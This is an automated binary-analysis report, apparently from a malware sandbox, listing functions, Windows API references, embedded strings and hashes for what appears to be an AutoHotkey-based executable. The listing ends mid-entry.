Opcode Fuzzy Hash: 4396e1471de1499f74233c48f3256c8c52fb829ccdef19fdb9ff9fb9e933ba6f
Instruction Fuzzy Hash: 7241863350469096EB7A4F13A8407BE72A1FB48BE5F180115FF9B476E8DB38CA50E325

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B18D, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 206COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B251
IsCharUpperW.USER32 ref: 000000014001B2D7

Strings

MZ@, xrefs: 000000014001ACE2
*%s up::, xrefs: 000000014001AC37
%s%s, xrefs: 000000014001B2F4
Return, xrefs: 000000014001B36D
{RCtrl up}, xrefs: 000000014001ABC7
{Blind}%s%s{%s DownTemp}, xrefs: 000000014001ABEE

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CharKeyboardLayoutUpper
String ID: %s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
API String ID: 1521781519-3819665344
Opcode ID: 5748765d65b5c4c7ed654db4c9640c1e0c29a2c1eaadcd359655d18170462434
Instruction ID: 8e992277c5bd7e4095c65e4cdaf224b690874ef00a0568bdb0ac331c2ecdcc13
Opcode Fuzzy Hash: 5748765d65b5c4c7ed654db4c9640c1e0c29a2c1eaadcd359655d18170462434
Instruction Fuzzy Hash: 0691953160468085F7729B66A4103EE77A1F75E7D8F944206FB850BAE5DB3AC989C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B1B4, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 206COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B251
IsCharUpperW.USER32 ref: 000000014001B2D7

Strings

MZ@, xrefs: 000000014001ACE2
*%s up::, xrefs: 000000014001AC37
%s%s, xrefs: 000000014001B2F4
Return, xrefs: 000000014001B36D
{RCtrl up}, xrefs: 000000014001ABC7
{Blind}%s%s{%s DownTemp}, xrefs: 000000014001ABEE

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CharKeyboardLayoutUpper
String ID: %s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
API String ID: 1521781519-3819665344
Opcode ID: 55dfec63b9c4784916def1d2d385db68e2984f5ee284dcf93e9f2e7382db1810
Instruction ID: e996dcf1210e84f6973d141208675f5805984be1b90e1338ad3883e68c59d66e
Opcode Fuzzy Hash: 55dfec63b9c4784916def1d2d385db68e2984f5ee284dcf93e9f2e7382db1810
Instruction Fuzzy Hash: 6B91A53160468085F7729B66E4103EE77A1F75E7D8F984106FB860BAE5DB3AC985C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B1D8, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 206COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B251
IsCharUpperW.USER32 ref: 000000014001B2D7

Strings

MZ@, xrefs: 000000014001ACE2
*%s up::, xrefs: 000000014001AC37
%s%s, xrefs: 000000014001B2F4
Return, xrefs: 000000014001B36D
{RCtrl up}, xrefs: 000000014001ABC7
{Blind}%s%s{%s DownTemp}, xrefs: 000000014001ABEE

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CharKeyboardLayoutUpper
String ID: %s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
API String ID: 1521781519-3819665344
Opcode ID: 00ad6ff7e6097c468761bf554df59c8cfd3c169258eb3c7de2453de6ab3a2a23
Instruction ID: f9d22b1be46fb244d68d21872ba938614a8d0855341de3a497f860e23224c328
Opcode Fuzzy Hash: 00ad6ff7e6097c468761bf554df59c8cfd3c169258eb3c7de2453de6ab3a2a23
Instruction Fuzzy Hash: 0F91B63260468085F7729B67E4103EE37A1F71E7D8F944106FB860BAE5DB3AC989C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B1FC, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 205COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B251
IsCharUpperW.USER32 ref: 000000014001B2D7

Strings

MZ@, xrefs: 000000014001ACE2
*%s up::, xrefs: 000000014001AC37
%s%s, xrefs: 000000014001B2F4
Return, xrefs: 000000014001B36D
{RCtrl up}, xrefs: 000000014001ABC7
{Blind}%s%s{%s DownTemp}, xrefs: 000000014001ABEE

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CharKeyboardLayoutUpper
String ID: %s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
API String ID: 1521781519-3819665344
Opcode ID: fe56639fb938ddf3a45c6946978923287c62902f8192ece89911753bc003fb3e
Instruction ID: 808c477b45acf703b50beb10173a5430243f6759a5dabc34f71f9264d1b769a9
Opcode Fuzzy Hash: fe56639fb938ddf3a45c6946978923287c62902f8192ece89911753bc003fb3e
Instruction Fuzzy Hash: 4491B53260468085F772DB66A4103EE37A1F71E7D8F984206FB950BAE5DB3AC989C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003949D, Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 198COMMON

Download Yara Rule

APIs

CreateSolidBrush.GDI32 ref: 00000001400395B2
CreateDCW.GDI32 ref: 0000000140039891
GetDeviceCaps.GDI32 ref: 00000001400398A2
GetStockObject.GDI32 ref: 00000001400398B0
SelectObject.GDI32 ref: 00000001400398BF
GetTextFaceW.GDI32 ref: 00000001400398D5
GetTextMetricsW.GDI32 ref: 00000001400398E5

Strings

DISPLAY, xrefs: 0000000140039885

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CreateObjectText$BrushCapsDeviceFaceMetricsSelectSolidStock
String ID: DISPLAY
API String ID: 2398714746-865373369
Opcode ID: 7b216ff44e32401be298720efe145231ba628eda6b4fa0dec25718c931fc7afc
Instruction ID: 6d85efb1b7a1b1625aaa84e9d9eb9dd0622b9001570bd50e3a462713b8380839
Opcode Fuzzy Hash: 7b216ff44e32401be298720efe145231ba628eda6b4fa0dec25718c931fc7afc
Instruction Fuzzy Hash: BC81F032601A9187EB279F27D4903EE33A0F3597D8F548226EB9647EE4EB38C595C700

Uniqueness

Uniqueness Score: -1.00%

Function 000000014001B186, Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 193COMMON

Download Yara Rule

APIs

GetKeyboardLayout.USER32 ref: 000000014001B251
IsCharUpperW.USER32 ref: 000000014001B2D7

Strings

MZ@, xrefs: 000000014001ACE2
*%s up::, xrefs: 000000014001AC37
%s%s, xrefs: 000000014001B2F4
Return, xrefs: 000000014001B36D
{RCtrl up}, xrefs: 000000014001ABC7
{Blind}%s%s{%s DownTemp}, xrefs: 000000014001ABEE

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CharKeyboardLayoutUpper
String ID: %s%s$*%s up::$MZ@$Return${Blind}%s%s{%s DownTemp}${RCtrl up}
API String ID: 1521781519-3819665344
Opcode ID: 1451f302594c157b045a53fd357d119578f5a48e9ec638858d9eba1968704027
Instruction ID: 9114e389ffdffbaaba2951e23f0a8a93a6cb4b66d8d4afa5d33a9675d0756824
Opcode Fuzzy Hash: 1451f302594c157b045a53fd357d119578f5a48e9ec638858d9eba1968704027
Instruction Fuzzy Hash: 7081A43260468085F772DB66A4103EE77A1F75E7D8F944206FB850BAE5DB3AC985C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014006D3A0, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 104registryCOMMON

Download Yara Rule

APIs

LoadCursorW.USER32 ref: 000000014006D46D
RegisterClassExW.USER32 ref: 000000014006D494

Strings

P, xrefs: 000000014006D3DC
AutoHotkeyGUI, xrefs: 000000014006D3CD
RegClass, xrefs: 000000014006D4AC

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ClassCursorLoadRegister
String ID: AutoHotkeyGUI$P$RegClass
API String ID: 1693014935-1255895312
Opcode ID: 3df8e288f0ceaee3e3294d07c7ac17d03adc674ab24cd633cf1902125b14c2e6
Instruction ID: faadf84c82a5d8c7439a8458bdfda83ec3bc8e098af630e1b3cf89b5b35c63f7
Opcode Fuzzy Hash: 3df8e288f0ceaee3e3294d07c7ac17d03adc674ab24cd633cf1902125b14c2e6
Instruction Fuzzy Hash: CF51EB72609B8086E762DB26F94039A73E5F78CB84F14412AEBCD93B68DF38C454CB00

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400494C2, Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 99COMMON

Download Yara Rule

APIs

GetDriveTypeW.KERNEL32 ref: 00000001400495A4

Strings

CDRom, xrefs: 00000001400494D5
:, xrefs: 0000000140049592
Fixed, xrefs: 0000000140049505
Network, xrefs: 000000014004951D
Removable, xrefs: 00000001400494ED
Unknown, xrefs: 000000014004954D
Ramdisk, xrefs: 0000000140049535

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: DriveType
String ID: :$CDRom$Fixed$Network$Ramdisk$Removable$Unknown
API String ID: 338552980-2138212569
Opcode ID: 0b450b676e35904a630711ed11b59bcbae0b0db75eac00644135fcede858965b
Instruction ID: 5ab737e9b32dd2bf42670551ebe357d5e1778dc65fae2f7c0ae650d4412a6b02
Opcode Fuzzy Hash: 0b450b676e35904a630711ed11b59bcbae0b0db75eac00644135fcede858965b
Instruction Fuzzy Hash: 95414A72704B8085F723DB22A4403E923A4B7997E4F925225FB29476F5EB38C685C709

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140025530, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 265COMMON

Download Yara Rule

Strings

Not allowed as an output variable., xrefs: 0000000140025949
variable, xrefs: 0000000140025873
This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 0000000140025738
_$#@, xrefs: 0000000140025801
This dynamically built variable name is too long. If this variable was not intended to be dynamic, remove the % symbols from it., xrefs: 0000000140025748
The following %s name contains an illegal character:"%-1.300s", xrefs: 000000014002587F

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID:
String ID: Not allowed as an output variable.$The following %s name contains an illegal character:"%-1.300s"$This dynamic variable is blank. If this variable was not intended to be dynamic, remove the % symbols from it.$This dynamically built variable name is too long. If this variable was not intended to be dynamic, remove the % symbols from it.$_$#@$variable
API String ID: 0-1451560060
Opcode ID: f8959629e6cd42db15bf4e9aa3e82111d9d445c8675019eae106e6fcd8f682f3
Instruction ID: 356bdbd87927b798a04959c5f339d84918a583e2ae1e257a9b5b602d9c0c9124
Opcode Fuzzy Hash: f8959629e6cd42db15bf4e9aa3e82111d9d445c8675019eae106e6fcd8f682f3
Instruction Fuzzy Hash: 2DC19CB1215A80C1FA62EB22E4543E973A5F74CBD9F84411AEB8D53AB1EB38C951C708

Uniqueness

Uniqueness Score: -1.00%

Function 00000001400542B0, Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 235COMMON

Download Yara Rule

APIs

RtlAcquirePebLock.NTDLL ref: 0000000140054300

Strings

0, xrefs: 00000001400545C5
MZ@, xrefs: 000000014005449D
Compile error %d at offset %d: %hs, xrefs: 000000014005459D

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AcquireLock
String ID: 0$Compile error %d at offset %d: %hs$MZ@
API String ID: 1242969663-621107290
Opcode ID: e29335d59e32361897001d4646b98702fcd985c05b191eb8ddd447f01cf61ed5
Instruction ID: 245aa2f261f75d079239efb59dcbfaed9c4bc1c98ee8b1b3152baed60bc75f0f
Opcode Fuzzy Hash: e29335d59e32361897001d4646b98702fcd985c05b191eb8ddd447f01cf61ed5
Instruction Fuzzy Hash: 45A15672204B9486EB62CF17E4943E977A0F748BC8F448116FB8A57BB8EB39C955C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014000E030, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 211COMMON

Download Yara Rule

APIs

CharUpperW.USER32 ref: 000000014000E2D3

Strings

OFF, xrefs: 000000014000E1BB
(no), xrefs: 000000014000E30B
MZ@, xrefs: 000000014000E0D1, 000000014000E0FE, 000000014000E12B, 000000014000E14D, 000000014000E17B
%s%s%s%s%s%s, xrefs: 000000014000E320
%i-%i, xrefs: 000000014000E2E6
PART, xrefs: 000000014000E284

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: CharUpper
String ID: %i-%i$%s%s%s%s%s%s$(no)$MZ@$OFF$PART
API String ID: 9403516-70096370
Opcode ID: c9a1b86bd3e5397fbdbe6d511eb2e860a999cc62dd8c5877702d9e8f1336c708
Instruction ID: 0f23f9dc4c8a1d4d696e65ffcdd29d3178d4a2903055a88051ac92913a1bffd2
Opcode Fuzzy Hash: c9a1b86bd3e5397fbdbe6d511eb2e860a999cc62dd8c5877702d9e8f1336c708
Instruction Fuzzy Hash: A5A19FB2205BD191EB66DB22F0507E97BA0F74DBC4F48551AEB8927BB4DB38C554C700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000140040610, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 208clipboardCOMMON

Download Yara Rule

APIs

Part of subcall function 000000014004E230: GetForegroundWindow.USER32 ref: 000000014004E270
Part of subcall function 000000014004E230: IsWindowVisible.USER32 ref: 000000014004E291

GetWindowTextLengthW.USER32 ref: 0000000140040644
IsClipboardFormatAvailable.USER32 ref: 00000001400406E1
IsClipboardFormatAvailable.USER32 ref: 00000001400406EE
GetWindowTextW.USER32 ref: 000000014004073A
IsClipboardFormatAvailable.USER32 ref: 000000014004081D
IsClipboardFormatAvailable.USER32 ref: 000000014004082A

Strings

<<>>, xrefs: 00000001400406F6, 0000000140040832

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: AvailableClipboardFormatWindow$Text$ForegroundLengthVisible
String ID: <<>>
API String ID: 4287936912-913080871
Opcode ID: 8280338d1d6a3c9ed5faf558040a3d9b3df7e2c4c11eba5e702f6a614fa2d13f
Instruction ID: 9e068f2c847bed877f68631d149dce5f1cc4345da1f1ab67a07ecd82af0949cc
Opcode Fuzzy Hash: 8280338d1d6a3c9ed5faf558040a3d9b3df7e2c4c11eba5e702f6a614fa2d13f
Instruction Fuzzy Hash: 5391D5B270864081FB27DB23A6403E92791A78CBD4F0A4525FB8A17AF7CF38D8558748

Uniqueness

Uniqueness Score: -1.00%

Function 000000014004025E, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 000000014004026A

Part of subcall function 00000001400A6D70: _invalid_parameter_noinfo.LIBCMT ref: 00000001400A6D97

SetWindowLongW.USER32 ref: 000000014004029C
SetWindowLongW.USER32 ref: 00000001400402D9
SetLayeredWindowAttributes.USER32 ref: 00000001400402EE

Strings

Off, xrefs: 000000014004027B

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Window$Long$AttributesLayered_invalid_parameter_noinfo
String ID: Off
API String ID: 3662379550-334568355
Opcode ID: 60682ecdf687e8977f7980419b92fe588e1760c9bd56b75e18718d9f67903aab
Instruction ID: 54d9d253576e537abca5202d4d5e93c7fa89a5ff414b5af5d274d5fa8ef3d72b
Opcode Fuzzy Hash: 60682ecdf687e8977f7980419b92fe588e1760c9bd56b75e18718d9f67903aab
Instruction Fuzzy Hash: 8C510F313046A182FB629B1BA4403FE66A0FB8CBD4F854231BF52676F2DE78C541D744

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005D130, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 113COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32 ref: 000000014005D160
OpenProcess.KERNEL32 ref: 000000014005D178
GetModuleBaseNameW.PSAPI ref: 000000014005D1A4
GetModuleFileNameExW.PSAPI ref: 000000014005D1AC
QueryDosDeviceW.KERNEL32 ref: 000000014005D253
CloseHandle.KERNEL32 ref: 000000014005D2CC

Strings

:, xrefs: 000000014005D225

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: ModuleNameOpenProcess$BaseCloseDeviceFileHandleQuery
String ID: :
API String ID: 1931077953-336475711
Opcode ID: 2935f87d620b45e46750f5958d89ede72ba9fb2bcb6f71f79c4beb8cc7e1c59d
Instruction ID: 0e8757b586063145778903e088da1898232c2ad5c4476d8fc7ca5f44d1860102
Opcode Fuzzy Hash: 2935f87d620b45e46750f5958d89ede72ba9fb2bcb6f71f79c4beb8cc7e1c59d
Instruction Fuzzy Hash: BC41AB71204A8192EB76DB53A8443E973A0FB98BC1F044227AF5947BF8EE39C9858704

Uniqueness

Uniqueness Score: -1.00%

Function 000000014003969D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 96windowCOMMON

Download Yara Rule

APIs

CreateDCW.GDI32 ref: 0000000140039891
GetDeviceCaps.GDI32 ref: 00000001400398A2
GetStockObject.GDI32 ref: 00000001400398B0
SelectObject.GDI32 ref: 00000001400398BF
GetTextFaceW.GDI32 ref: 00000001400398D5
GetTextMetricsW.GDI32 ref: 00000001400398E5
GetIconInfo.USER32 ref: 00000001400399BF
GetObjectW.GDI32 ref: 00000001400399E6
DeleteObject.GDI32 ref: 0000000140039ABA
DeleteObject.GDI32 ref: 0000000140039AC4
MulDiv.KERNEL32 ref: 0000000140039AE3
SetRect.USER32 ref: 0000000140039B19
MulDiv.KERNEL32 ref: 0000000140039B49
CreateFontW.GDI32 ref: 0000000140039BC2
MulDiv.KERNEL32 ref: 0000000140039BE7

Strings

DISPLAY, xrefs: 0000000140039885

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308673445.0000000140104000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308680268.0000000140107000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308703206.000000014010E000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308711984.000000014013A000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308727077.000000014013D000.00000008.00020000.sdmp Download File

Similarity

API ID: Object$CreateDeleteText$CapsDeviceFaceFontIconInfoMetricsRectSelectStock
String ID: DISPLAY
API String ID: 3544818348-865373369
Opcode ID: da5736ec3df926be64205fe302eab28e95b290c12d1b266e9472528bad46daff
Instruction ID: 67cb6236386bfcb393edd4fc9eb935774adb38559d34a7c006f52a65362d431a
Opcode Fuzzy Hash: da5736ec3df926be64205fe302eab28e95b290c12d1b266e9472528bad46daff
Instruction Fuzzy Hash: AD418F326017818AEB279F2694543EE37B0F399B84F188119EB4A07BA4DB39C595C740

Uniqueness

Uniqueness Score: -1.00%

Function 000000014005F125, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32 ref: 000000014005F13E
SetLastError.KERNEL32 ref: 000000014005F1A0
SetWindowLongW.USER32 ref: 000000014005F1AF
GetLastError.KERNEL32 ref: 000000014005F1B9
GetWindowLongW.USER32 ref: 000000014005F1CD
InvalidateRect.USER32 ref: 000000014005F1E5

Strings

+-^, xrefs: 000000014005F147

Memory Dump Source

Source File: 00000000.00000002.308458117.0000000140001000.00000040.00020000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000000.00000002.308447097.0000000140000000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.308621110.00000001400DD000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.308655476.00000001400FB000.00000040.00020000.sdmp Download File
